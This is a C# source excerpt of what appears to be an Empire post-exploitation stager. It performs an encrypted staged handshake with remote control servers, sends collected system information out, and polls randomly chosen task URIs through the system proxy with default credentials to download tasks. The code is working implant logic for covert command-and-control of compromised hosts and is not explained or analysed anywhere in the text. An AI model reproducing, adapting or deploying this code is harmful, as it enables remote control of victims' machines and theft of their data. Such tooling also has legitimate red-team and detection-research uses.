////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal byte[] GetTask()
{
byte[] results = new byte[0];
try
{
byte[] routingPacket = NewRoutingPacket(null, 4);
string routingCookie = Convert.ToBase64String(routingPacket);
WebClient webClient = new WebClient();
webClient.Proxy = WebRequest.GetSystemWebProxy();
webClient.Proxy.Credentials = CredentialCache.DefaultCredentials;
webClient.Headers.Add("User-Agent", sessionInfo.GetUserAgent());
webClient.Headers.Add("Cookie", "session=" + routingCookie);
Random random = new Random();
string selectedTaskURI = sessionInfo.GetTaskURIs()[random.Next(0, sessionInfo.GetTaskURIs().Length)];
results = webClient.DownloadData(sessionInfo.GetControlServers()[ServerIndex] + selectedTaskURI);
}
catch (WebException webException)
{
MissedCheckins++;
if ((int)((HttpWebResponse)webException.Response).StatusCode == 401)
{
//Restart everything
}
}
return(results);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private byte[] Stage2(byte[] stage1response)
{
Random random = new Random();
////////////////////////////////////////////////////////////////////////////////
byte[] decrypted = rsaCrypto.Decrypt(stage1response, false);
string decryptedString = Encoding.ASCII.GetString(decrypted);
string nonce = decryptedString.Substring(0, 16);
sessionInfo.SetSessionKey(decryptedString.Substring(16, decryptedString.Length - 16));
byte[] keyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetSessionKey());
////////////////////////////////////////////////////////////////////////////////
long increment = Convert.ToInt64(nonce);
increment++;
nonce = increment.ToString();
byte[] systemInformationBytes = GetSystemInformation(nonce + "|", string.Join(",", sessionInfo.GetControlServers()));
byte[] initializationVector = new byte[16];
random.NextBytes(initializationVector);
byte[] encryptedInformationBytes = aesEncrypt(keyBytes, initializationVector, systemInformationBytes);
encryptedInformationBytes = Misc.combine(initializationVector, encryptedInformationBytes);
////////////////////////////////////////////////////////////////////////////////
using (HMACSHA256 hmac = new HMACSHA256())
{
hmac.Key = keyBytes;
byte[] hmacHash = hmac.ComputeHash(encryptedInformationBytes).Take(10).ToArray();
encryptedInformationBytes = Misc.combine(encryptedInformationBytes, hmacHash);
}
////////////////////////////////////////////////////////////////////////////////
return(SendStage(0x03, encryptedInformationBytes, "/index.php"));
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private byte[] Stage1()
{
Random random = new Random();
////////////////////////////////////////////////////////////////////////////////
string rsaKey = rsaCrypto.ToXmlString(false);
byte[] rsaKeyBytes = Encoding.ASCII.GetBytes(rsaKey);
////////////////////////////////////////////////////////////////////////////////
byte[] initializationVector = new byte[16];
random.NextBytes(initializationVector);
byte[] encryptedBytes = aesEncrypt(stagingKeyBytes, initializationVector, rsaKeyBytes);
encryptedBytes = Misc.combine(initializationVector, encryptedBytes);
////////////////////////////////////////////////////////////////////////////////
HMACSHA256 hmac = new HMACSHA256();
hmac.Key = stagingKeyBytes;
byte[] hmacBytes = hmac.ComputeHash(encryptedBytes);
encryptedBytes = Misc.combine(encryptedBytes, hmacBytes.Take(10).ToArray());
////////////////////////////////////////////////////////////////////////////////
return(SendStage(0x02, encryptedBytes, sessionInfo.GetControlServers().First() + "/index.jsp"));
}
static void Main(string[] args)
{
#if (COMMAND_LINE)
if (args.Length < 3)
{
return;
}
SessionInfo sessionInfo = new SessionInfo(args);
#endif
#if (COMPILE_TIME)
SessionInfo sessionInfo = new SessionInfo();
#endif
#if (PRINT)
Console.WriteLine("EmpireServer: {0}", sessionInfo.GetControlServers());
Console.WriteLine("StagingKey: {0}", sessionInfo.GetStagingKey());
Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage());
#endif
(new EmpireStager(sessionInfo)).Execute();
}